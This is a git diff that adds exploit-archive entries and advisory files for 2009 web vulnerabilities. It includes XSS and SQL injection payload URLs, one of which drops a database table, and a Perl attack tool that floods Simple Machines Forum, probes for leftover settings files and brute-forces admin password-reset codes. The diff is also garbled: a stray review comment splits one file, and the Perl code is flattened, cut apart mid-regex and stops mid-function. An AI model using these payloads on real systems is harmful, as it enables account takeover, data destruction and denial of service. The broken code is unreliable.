diff --git a/files.csv b/files.csv
index ef2f2ac58..456318ba4 100755
--- a/files.csv
+++ b/files.csv
@@ -29460,3 +29460,14 @@ id,file,description,date,author,platform,type,port
 32700,platforms/linux/local/32700.rb,"ibstat $PATH Privilege Escalation",2014-04-04,metasploit,linux,local,0
 32701,platforms/php/webapps/32701.txt,"Wordpress XCloner Plugin 3.1.0 - CSRF Vulnerability",2014-04-04,"High-Tech Bridge SA",php,webapps,80
 32702,platforms/hardware/dos/32702.txt,"A10 Networks ACOS 2.7.0-P2(build: 53) - Buffer Overflow",2014-04-04,"Francesco Perna",hardware,dos,80
+32708,platforms/jsp/webapps/32708.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_allgemeinauftrag.jsp Multiple Parameter XSS",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
+32709,platforms/jsp/webapps/32709.txt,"Plunet BusinessManager 4.1 pagesUTF8/Sys_DirAnzeige.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
+32710,platforms/jsp/webapps/32710.txt,"Plunet BusinessManager 4.1 pagesUTF8/auftrag_job.jsp Pfad Parameter Direct Request Information Disclosure",2009-01-07,"Matteo Ignaccolo",jsp,webapps,0
+32711,platforms/windows/remote/32711.txt,"Multiple CA Service Management Products Unspecified Remote Command Execution Vulnerability",2009-01-07,"Michel Arboi",windows,remote,0
+32712,platforms/multiple/dos/32712.txt,"IBM WebSphere DataPower XML Security Gateway 3.6.1 XS40 Remote Denial Of Service Vulnerability",2009-01-08,Erik,multiple,dos,0
+32713,platforms/php/webapps/32713.txt,"tadbook2 Module for XOOPS 'open_book.php' SQL Injection Vulnerability",2009-01-07,stylextra,php,webapps,0
+32714,platforms/php/webapps/32714.txt,"Visuplay CMS Multiple SQL Injection Vulnerabilities",2009-01-12,"Joseph Giron",php,webapps,0
+32715,platforms/php/dos/32715.php,"PHP <= 5.2.8 'popen()' Function Buffer Overflow Vulnerability",2009-01-12,e.wiZz!,php,dos,0
+32716,platforms/asp/webapps/32716.html,"Comersus Cart 6 User Email and User Password Unauthorized Access Vulnerability",2009-01-12,ajann,asp,webapps,0
+32717,platforms/php/webapps/32717.pl,"Simple Machines Forum <= 
1.1.5 Password Reset Security Bypass Vulnerability",2009-01-12,Xianur0,php,webapps,0
+32718,platforms/php/webapps/32718.txt,"Ovidentia 6.7.5 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2009-01-12,"Ivan Sanchez",php,webapps,0
diff --git a/platforms/asp/webapps/32716.html b/platforms/asp/webapps/32716.html
new file mode 100755
index 000000000..fce63ec45
--- /dev/null
+++ b/platforms/asp/webapps/32716.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33217/info
+
+Comersus Cart is prone to a vulnerability that can result in unauthorized access.
+
+An attacker can exploit this issue to gain unauthorized access to the affected application. Successfully exploiting this issue may compromise the application.
+
+Comersus Cart 6 is vulnerable; other versions may also be affected.
+
+
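Review bot: The added 32717 index entry (the line beginning at the end of the previous hunk line and continuing here) records the affected range as `Simple Machines Forum <= 1.1.5`, while the advisory text added for platforms/php/webapps/32717.pl later in this commit says versions up to and including 1.1.7 are vulnerable and that the vendor resolved the issue in 1.0.14 and 1.1.6. Those two statements disagree with each other and with the index, so anyone triaging exposure by version gets three different upper bounds; the index description should be reconciled with whichever figure is taken as authoritative, e.g. `"Simple Machines Forum <= 1.1.5 Password Reset Security Bypass Vulnerability"` kept only if the vendor's 1.1.6 fix is the basis, otherwise raised accordingly. The 32712 entry likewise abbreviates the firmware to `3.6.1` where its advisory names `3.6.1.5`; presumably intentional, but worth confirming since the rest of the entry keeps the full product name.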
Name
Last Name
Company
Phone
Email Edit
Password Edit
Address
Zip
State
Non listed state
City
Country
   
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32708.txt b/platforms/jsp/webapps/32708.txt
new file mode 100755
index 000000000..f465734d1
--- /dev/null
+++ b/platforms/jsp/webapps/32708.txt
@@ -0,0 +1,37 @@
+source: http://www.securityfocus.com/bid/33153/info
+
+Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
+
+Versions prior to BusinessManager 4.2 are vulnerable.
+
+POST /pagesUTF8/auftrag_allgemeinauftrag.jsp HTTP/1.1
+Host: or IP
+User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16)
+Gecko/20080718
+Ubuntu/8.04 (hardy) Firefox/2.0.0.16
+Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,
+text/plain;q=0.8,image/png,*/*;q=0.5
+Accept-Language: en-us,en;q=0.5
+Accept-Encoding: gzip,deflate
+Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
+Keep-Alive: 300
+Proxy-Connection: keep-alive
+Referer: http://www.example.com/pagesUTF8/auftrag_allgemeinauftrag.jsp
+Cookie: JSESSIONID=0B1347DFFD031E6BC1944C381A31293D
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1085
+
+TokenUAID=42&QUK=1449&QUKA=*&QUKANSCH=820&QUKLIEFANSCH=820&QUZ=sample&
+VorlageID=3&QU02=1-&QUL=sample&QUB=%22%3E%3Cscript%3Ealert%28%22XSS2%22%29
+%3B%3C%2Fscript%3E&QUG=sample&OSPK01=141&OSPK02=0&OSSK05=&OSSK09=1&PJ12=14
+&DATAUFTT=07&DATAUFMM=01&DATAUFJJJJ=2008&DATLIEFTT=24&DATLIEFMM=01&
+DATLIEFJJJJ=2008&DATLIEFHH=&DATLIEFMN=&PJ13=&
+Bez74=%22%3E%3Cscript%3Ealert%28%22XSS4%22%29%3B%3C%2Fscript%3E&
+LDate74TT=24&LDate74MM=01&LDate74JJJJ=2008&LDate74HH=13&
+LDate74MN=00&BOXP74=4&REA01774=59&REA01874=sample&
+OutPE0174=0&OutPAP74=8385&Bem74=sample&REA001=&REA010=&REA007=1&REA008=2&
+REA011=0&REA013=0&REA015=0&LEISTung=sample&LangFlag=&exit=&SelectTab=
+&ContentBox=&OpenContentBox=&LoginPressed=false&SaveButton=true&
+CheckXYZ=Send&yOffsetScroll=0
diff --git a/platforms/jsp/webapps/32709.txt b/platforms/jsp/webapps/32709.txt
new file mode 100755
index 000000000..c38e2b28a
--- /dev/null
+++ b/platforms/jsp/webapps/32709.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/33153/info
+
+Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
+
+Versions prior to BusinessManager 4.2 are vulnerable.
+
+http://www.example.com/pagesUTF8/Sys_DirAnzeige.jsp?AnzeigeText=/PRM&Pfad=/ORDER/
+C-00042/PRM
\ No newline at end of file
diff --git a/platforms/jsp/webapps/32710.txt b/platforms/jsp/webapps/32710.txt
new file mode 100755
index 000000000..02597bbd9
--- /dev/null
+++ b/platforms/jsp/webapps/32710.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/33153/info
+
+Plunet BusinessManager is prone to multiple security-bypass and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, control how the site is rendered to the user, or perform unauthorized actions as another user; other attacks may also be possible.
+
+Versions prior to BusinessManager 4.2 are vulnerable.
+
+http://www.example.com/pagesUTF8/auftrag_job.jsp?OSG05=1944&anchor=AJob31944 surf jobs
\ No newline at end of file
diff --git a/platforms/multiple/dos/32712.txt b/platforms/multiple/dos/32712.txt
new file mode 100755
index 000000000..4b0f33152
--- /dev/null
+++ b/platforms/multiple/dos/32712.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/33169/info
+
+IBM WebSphere DataPower XML Security Gateway XS40 is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.
+
+Remote attackers can exploit this issue to cause the device to reboot, denying service to legitimate users.
+
+WebSphere DataPower XML Security Gateway XS40 with firmware 3.6.1.5 is affected; other versions may also be vulnerable.
+
+The following string is sufficient to trigger this issue:
+
+?abc?
\ No newline at end of file
diff --git a/platforms/php/dos/32715.php b/platforms/php/dos/32715.php
new file mode 100755
index 000000000..3d991d234
--- /dev/null
+++ b/platforms/php/dos/32715.php
@@ -0,0 +1,15 @@
+source: http://www.securityfocus.com/bid/33216/info
+
+PHP is prone to a buffer-overflow vulnerability because it fails to perform boundary checks before copying user-supplied data to insufficiently sized memory buffers.
+
+An attacker can exploit this issue to execute arbitrary machine code in the context of the affected webserver. Failed exploit attempts will likely crash the webserver, denying service to legitimate users.
+
+PHP 5.2.8 and prior versions are vulnerable.
+
+UPDATE (March 4, 2009): Further reports indicate that this issue may not be exploitable as described. We will update this BID pending further investigation.
+
+
diff --git a/platforms/php/webapps/32713.txt b/platforms/php/webapps/32713.txt
new file mode 100755
index 000000000..7e443f691
--- /dev/null
+++ b/platforms/php/webapps/32713.txt
@@ -0,0 +1,12 @@
+source: http://www.securityfocus.com/bid/33196/info
+
+The tadbook2 module for XOOPS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+
+http://www.example.com/modules/tadbook2/open_book.php?book_sn=-5/**/union/**/select/**/version(),2/*
+
+http://www.example.com/modules/tadbook2/open_book.php?book_sn=-1/**/union/**/select/**/version(),2/*
+
+http://www.example.com/modules/tadbook2/open_book.php?book_sn=-10/**/union/**/select/**/version(),2/*
\ No newline at end of file
diff --git a/platforms/php/webapps/32714.txt b/platforms/php/webapps/32714.txt
new file mode 100755
index 000000000..91e63a678
--- /dev/null
+++ b/platforms/php/webapps/32714.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/33209/info
+
+Visuplay CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/html/news_article.php?press_id=1;DROP%20table%20news;--&nav_id=7
\ No newline at end of file
diff --git a/platforms/php/webapps/32717.pl b/platforms/php/webapps/32717.pl
new file mode 100755
index 000000000..9d639c9ca
--- /dev/null
+++ b/platforms/php/webapps/32717.pl
@@ -0,0 +1,207 @@ +source: http://www.securityfocus.com/bid/33219/info + +Simple Machines Forum is prone to a security-bypass vulnerability because it fails to adequately restrict access to the password-reset feature. + +An attacker can exploit this issue to gain administrative access to the application, which may allow the attacker to compromise the application; other attacks are also possible. + +Versions up to and including Simple Machines Forum 1.1.7 are vulnerable. + +UPDATE (February 6, 2009): The vendor indicates that this issue was resolved in Simple Machines Forum 1.0.14 and 1.1.6. + +#!/usr/bin/perl + + use LWP::UserAgent; + use Getopt::Std; + use LWP::Simple; + use HTTP::Request; + +#Author: Xianur0 +#Uxmal666[at]gmail.com +# Cracks links Password Recovery +# Find Temporary Files executed by mods +# DB function Flood by Error Log +# File Path Disclosure +# List installed Mods (Useful To Find Mods Vulnerable) +# etc. .. + +print "\n\n\x09\x09\x09\x09\x09SMF Destroyer 0.1 By Xianur0 [Priv8]\n\n"; +my $url = $ARGV[1] || die ("Use: smf.pl [option] [Full URL] +[Proxy:Puerto]\nOptions:\n-f Flood \n-p Search Directory Setup \n-l +Installed Mods List \n-b Find Temporary\n-c Cracks links Password +Recovery (Recommended Use Proxy)"); +version(); +my $proxy = $ARGV[2] || ""; +if($ARGV[0] ne "-c" && $proxy ne "") { +$ua->proxy(["http"], "http://".$proxy); +} + + getopts('fplbc', \%opt); + crackeador() if $opt{c}; + flood() if $opt{f}; + path() if $opt{p}; + list() if $opt{l}; + temp() if $opt{b}; + +sub headers { +$req->header('Accept' => 'text/html'); +$req->header('Accept-Language' => 'es-es,es;q=0.8,en-us;q=0.5,en;q=0.3'); +} + +sub version { +$ua = LWP::UserAgent->new; +$ua->agent('Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.12) +Gecko/20080201 Firefox/2.0.0.12'); +$req = HTTP::Request->new(GET => $url); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +if ($html =~ /title="Simple Machines Forum" 
target="_blank">Powered by +SMF (.*?)<\/a>/){ +$version = $1; +print "\n[X] SMF Version: $version\n"; +if($version < "1.1.7") { +print "\n[X] Outdated Version $version!!!!!!!!!!!\n\n[X] +http://milw0rm.com/search.php?dong=smf".$version."\n\n"; +} +}}} + +sub path { +$req = HTTP::Request->new(GET => $url.'/SSI.php?ssi_layers'); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +if ($html =~ /Undefined variable: ssi_layers in (.*?)SSI.php/){ +print "[X] Directory: $1\n"; +} else { print "[!] Getting error Directory!\n";} +} +} + +sub flood { +print "[X] Starting Flood! (Press Ctrl + C To Finish)\n"; +$texto = "Flood!!!!!" x 15; +$req = HTTP::Request->new(GET => +$url.'/index.php?action=help;page['.$texto.']=loginout'); +&headers; +for($i = 1; $i<10000; $i++) { +$res = $ua->request($req); +if ($res->is_success) { +print "[-] Sent: ".$i."\n"; +} else { +print "[!] HTTP Error Query: " . $res->status_line . "\n"; +} +} +} + + +sub temp { +@temps=('index.php~','Settings.php~','Settings_bak.php~'); +foreach $temp (@temps) { +$req = HTTP::Request->new(GET => $url."/".$temp); +&headers; +$res = $ua->request($req); +if ($res->is_success) { +print "[X] Temporary File Found: ".$url."/".$temp."\n"; +} else {print "[!] 
Not Found: ".$url."/".$temp."\n";} +} +} + +sub list { +$req = HTTP::Request->new(GET => $url."/Packages/installed.list"); +&headers; +$res = $ua->request($req); +if ($res->is_success) { + my $html = $res->content; +my @htmls = split("\n", $html); +foreach $mod (@htmls) { +my @mod = split('\|\^\|', $mod); +print "[X]Package:\nDescription: $mod[0]\nFile: +$url/Packages/$mod[1]\nName: $mod[2]\nVersion: $mod[3]\n\n"; + +} +} +} + +sub crackeador() { +$url = $ARGV[0]; +$nick = $ARGV[1]; +$id = $ARGV[2] || die("Use: smf.pl -c [URL SMF] [Nick Admin] [ID +Admin] [Proxy:Puerto]\nExample: smf.pl -p +http://www.simplemachines.org/community/ dschwab9 179 +www.carlosslim.com:3128\n"); +my $reminder = $url."?action=reminder"; +my $smf = $reminder.";sa=setpassword;u=".$id.";code="; +my $proxy = $ARGV[3]; +if($proxy ne "") { +$ua->proxy(["http"], "http://".$proxy); +} + +sub mail() { +my $content = HTTP::Request->new(GET => $reminder); +$contenedor = $ua->request($content)->as_string; +if ($contenedor =~ /Set-Cookie: (.*?) +/){ + print "\n[+] SESSION Detected: $1\n"; +$session = $1; +} else { die "[!] 
SESSION could not be found!\n";} +if ($contenedor =~ /new(POST => $reminder.';sa=mail'); + $req->content_type('application/x-www-form-urlencoded'); + $req->content('user='.$nick.'&sc='.$sc.'&=enviar'); + $req->header('Cookie' => $session); +my $res = $ua->request($req)->as_string; +if(!$res) {exit;} +print "[x]Sent!\n"; + +} + +sub generador() { +my $password = ""; +my @chars = split(" ", + "0 1 2 3 4 5 6 7 8 9 a b c d e + f g h i j k l m n o p q r s t + u v w x y z"); +for (my $i=0; $i < 10 ;$i++) { + $_rand = int(rand 35); + $password .= $chars[$_rand]; +} +return $password; +} + +sub brute() { +while($bucle ne "finito") { +$code = generador(); + my $fuente = $reminder.";sa=setpassword;u=".$id.";code=".$code; + my $content = HTTP::Request->new(GET => $reminder); + my $content = $ua->request($content)->as_string; +if ($content =~ /new(POST => $reminder.';sa=mail'); + $req->content_type('application/x-www-form-urlencoded'); + $req->content('passwrd1=xianur0washere&passwrd2=xianur0washere&code='.$code.'&u='.$id.'&sc='.$sc); + $req->header('Cookie' => $session); + $res = $ua->request($req); + if ($res->is_success) { + if($res->content =~ '